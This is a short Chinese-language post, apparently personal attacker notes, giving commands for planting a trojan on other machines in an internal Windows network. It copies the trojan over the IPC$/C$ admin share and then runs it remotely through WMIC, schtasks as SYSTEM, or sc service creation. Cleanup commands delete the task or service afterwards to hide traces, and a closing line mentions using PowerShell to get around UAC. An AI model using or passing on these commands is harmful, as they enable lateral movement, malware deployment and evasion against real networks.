内网IPC$种马的三种方法

copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host schtasks /F /delete /tn foobar /S host ##清除schtasks

SC添加服务远程运行命令

sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径 sc \\host start foobar ##启动建立的服务 sc \\host delete foobar ##完事后删除服务

20150805:

1、系统权限 sc \\10.1.1.1 create winnt binpath= c:\cmd.exe sc \\10.1.1.1 start winnt sc \\10.1.1.1 delete winnt

2.指定用户权限启动 sc \\10.1.1.1 create adminsec binpath = “c:\pass.exe” obj= “adminsec\administrator” passwrod= adminsec sc \\10.1.1.1 start adminsec

个人有些想法就是通过powershell去可以避免uac什么什么的，后续整理了补发一下。